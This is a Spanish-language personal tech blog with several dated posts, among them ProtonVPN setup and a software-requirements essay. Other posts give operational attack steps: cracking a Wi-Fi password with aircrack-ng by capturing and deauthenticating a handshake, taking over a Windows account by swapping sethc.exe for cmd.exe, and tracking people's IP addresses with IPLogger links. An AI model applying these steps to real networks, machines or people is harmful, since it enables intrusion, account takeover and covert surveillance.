miércoles, 4 de diciembre de 2024

Instalar una VPN

 sudo apt install openvpn dialog python3-pip

sudo pip3 install protonvpn-cli

Si tu sistema esta instalado por entornos aislados usa:

sudo apt install pipx



pipx install protonvpn-cli


Añadimos el local bin al path

pipx ensurepath


Ejecutamos: 
protonvpn



Iniciamos:
protonvpn init 
.

UDP: User datagram protocol, es mas rápido pero no hace comprobaciones de errores y retransmisión de paquetes
TCP: Transmission control protocol, hace un sistema de verificación de entrega de paquetes 

Recomiendo usar UDP y TCP en caso de que haya problemas de conexión por ser una red que bloquea UDP

Opción Gráfica

sudo apt update
sudo apt install -y protonvpn

https://protonvpn.com/support/official-linux-vpn

Verificamos nuestra ubicación mediante nuestra ip:
https://whatismyipaddress.com/


domingo, 13 de octubre de 2024

Ataque de Fuerza Bruta

 

Consejos para proteger una red:

  • Usar WPA3 en lugar de WPA/WPA2, ya que ofrece una mayor seguridad.
  • Configurar una contraseña compleja y aleatoria para evitar ataques de diccionario.
  • Desactivar WPS, que es un punto débil en muchos routers.

Procedimiento para realizar un ataque de fuerza bruta con Aircrack-ng:

  1. Instalar Aircrack-ng: Abre una terminal y ejecuta el siguiente comando para instalar el conjunto de herramientas:

sudo apt install aircrack-ng

Colocar la antena Wi-Fi en modo monitor: El modo monitor permite escuchar el tráfico de todas las redes cercanas. Para habilitarlo:

  • Obtén el nombre de tu interfaz de red Wi-Fi (generalmente algo como wlp1s0)


ifconfig


Inicia el modo monitor

sudo airmon-ng start wlp1s0

Verifica que la interfaz esté en modo monitor con

ifconfig



Escanear redes Wi-Fi cercanas: Usa airodump-ng para listar las redes Wi-Fi que están a tu alcance:

sudo airodump-ng wlp1s0mon

Se mostrará una lista de redes Wi-Fi. Identifica la red objetivo (copia el BSSID y el canal donde se encuentra).

Captura de tráfico de red: Para empezar a capturar el tráfico de la red objetivo, usa el BSSID y el canal que obtuviste:


sudo airodump-ng -c [CANAL] --bssid [BSSID] -w [NOMBRE_ARCHIVO] wlp1s0mon

Reemplaza [CANAL][BSSID] y [NOMBRE_ARCHIVO] con los valores apropiados



Desautenticar a un dispositivo de la red (opcional pero recomendado): Para acelerar la captura del handshake, desautentica a un cliente conectado a la red, forzándolo a reconectarse:



sudo aireplay-ng -0 9 -a [BSSID] -c [ESTACION] wlp1s0mon

Donde:

[BSSID] es el identificador de la red.

[ESTACION] es la dirección MAC del dispositivo conectado que deseas desautenticar (que aparece en la columna "Station" al ejecutar airodump-ng).

Nota: Ejecuta este comando varias veces hasta que se capture el handshake (en la pantalla de airodump-ng verás el mensaje "WPA handshake").



Verifica que el handshake ha sido capturado: Una vez que el handshake se capture correctamente, se generarán archivos con la extensión .cap. Este archivo contiene el tráfico capturado y es necesario para realizar el ataque de fuerza bruta.



Realizar el ataque de fuerza bruta: Usa el diccionario rockyou.txt (o cualquier otro diccionario de contraseñas) y el archivo .cap para ejecutar el ataque con aircrack-ng:



sudo aircrack-ng -b [BSSID] -w [DICCIONARIO] [ARCHIVO_CAP]

Reemplaza [BSSID], [DICCIONARIO], y [ARCHIVO_CAP] con los valores correspondientes.

Por ejemplo:

sudo aircrack-ng -b 78:94:B4:AE:44:53 -w rockyou.txt auditoria-01.cap



Restaurar la antena Wi-Fi a modo normal: Una vez que hayas terminado, vuelve a colocar la antena Wi-Fi en modo normal:

sudo airmon-ng stop wlp1s0mon

domingo, 29 de septiembre de 2024

Proceso de obtención de requerimientos, su interacción y secuencialidad entre ellos

El proceso de obtención de requerimientos sienta las bases para todas las actividades posteriores. 

Son una serie de interacciones y secuencialidad que garantizan que el software cumpla con las expectativas del cliente. 

1. Captura de Requerimientos

Aquí se identifican las necesidades y expectativas del cliente mediante entrevistas, cuestionarios y sesiones de lluvia de ideas.

  • Interacción: Involucra al cliente y a los desarrolladores mediante una comunicación abierta
  • Secuencialidad: Se recopila, organiza y clasifica l ainformación por requerimientos (usuario, funcional, no funcional y del dominio).

2. Análisis de Requerimientos

Se analizan los requerimientos

  • Reconocimiento del Problema: Identificar y definir el problema a resolver
  • Evaluación y Modelización: Evaluar la viabilidad de los requerimientos y modelar las interacciones del sistema.
  • Especificación: Documentar definiendo la funcionalidad esperada y las restricciones operativas (evitar detalles técnicos)

3. Validación de Requerimientos

  • Revisión con el Cliente: Se presenta los requerimientos docuemtnados al cliente para recibir su confirmación.
  • Pruebas de Validación: Los requerimientos deben ser comprobables y verificables a lo largo del proceso de desarrollo.

4. Especificación Final

Se formaliza la documentación de los requerimientos.

  • Precisión: Sin ambigüedades.
  • Completo: Los aspectos del funcionamiento esten cubiertos.
  • Documentado: La documentación es accesible y está en concordancia con lo solicitado por el cliente.

5. Evolución de los Requerimientos

  • Interacción Continua: Tener comunicación con el cliente para adaptarse a nuevas demandas.
  • Adaptación y Revisión: Revisar los requerimientos periódicamente 

Interacción y Secuencialidad entre Fases

  • La interacción debe ser continua. un ejemplo sería un caso donde la validación puede llevar a ajustes en la especificación, lo que puede requerir revisiones en la captura de requerimientos.
  • La secuencialidad es que cada fase debe completarse adecuadamente antes de pasar a la siguiente, aunque puede haber retroalimentación y requerir volver para cubrir esos aspectos del software.

jueves, 12 de septiembre de 2024

Acceder a la Dark Web desde una terminal

Se puede realizar mediante un script en Python como Darkdump
Este usa el motor de búsqueda Ahmia para encontrar y listar enlaces de sitios web de la Dark Web con extensión .onion, indexa sitios web de la Dark Web mediante web scraping y Darkdump usa la librería BeautifulSoup para analizar el HTML de las páginas de resultados de Ahmia.
Proceso
• Darkdump realiza solicitudes HTTP a Ahmia (https://ahmia.fi)
• Se usa BeautifulSoup (librería para el análisis de HTML y XML) para extraer los enlaces y descripciones de las páginas que aparecen en los resultados de búsqueda.
• Se hace uso de servicios como ProxyScrape (https://proxyscrape.com). para ocultar la dirección IP real del usuario, pero estos suelen ser poco fiables.
Ejemplo:
1. Se requiere Python y sus dependencias requests y BeautifulSoup
import requests
from bs4 import BeautifulSoup
# URL de Ahmia para la búsqueda
ahmia_url = 'https://ahmia.fi/search/?q='
# Realiza la solicitud HTTP a Ahmia
query = 'your_search_term'  # Poner lo que se va a buscar
response = requests.get(ahmia_url + query)
# Verifica si la solicitud fue exitosa
if response.status_code == 200:
    soup = BeautifulSoup(response.text, 'html.parser')
    results = soup.find_all('a', href=True)    
    for link in results:
        # Muestra los enlaces .onion encontrados
        if '.onion' in link['href']:
            print(f"Found Onion link: {link['href']}")
else:
    print("Error retrieving Ahmia search results.")
Recomendaciones
• Usar Tor para evitar las proxis públicas
• Usar una máquina virtual o un entorno de arranque en vivo

Acceso no autorizado a cuentas Windows mediante “Sticky Keys”

Son las teclas de filtro
1.Se abre el cmd con privilegios de administrador
2.Se accede mediante un cd o una usb al medio de arranque para acceder al disco duro
3.Se accede a C:\Windows\System32
4.Se busca el archivo sethc.exe  (ejecutable de sticky keys)
5.Se reemplaza el archivo sethc.exe por cmd.exe de este modo cmd.exe quedaría con el nombre de sethc.exe
6.A sethc.exe se le puede poner como sethc_x.exe
7.Se reinicia el equipo
8.Se presiona varias veces Shift 5 para activar las sticky keys
9.Se registra el comando net user [nombre del usuario] *
 
Esta vulnerabilidad se corrigió en 2019

martes, 20 de agosto de 2024

Rastreo de ubicación por imagen

 IPLogger es una herramienta que te permite rastrear quién ve un enlace, imagen o archivo que compartes. Cuando alguien hace clic en uno de estos enlaces, se registra su dirección IP y otros datos como su ubicación aproximada.

La razón por la que la ubicación no siempre es exacta es porque la IP muestra la ubicación general, como la ciudad o la región, en lugar de una dirección específica. Si se usa una VPN o un proxy, la ubicación puede estar completamente desviada de su ubicación real. 


www.iplogger.org


Se copia el enlace









domingo, 28 de julio de 2024

Evil crow

 

Cable indetectable para antivirus

El sistema lo reconoce como un teclado

Cuenta con micro controlador ATTINY85

Compatible con arduino


https://github.com/joelsernamoreno/EvilCrowRF-V2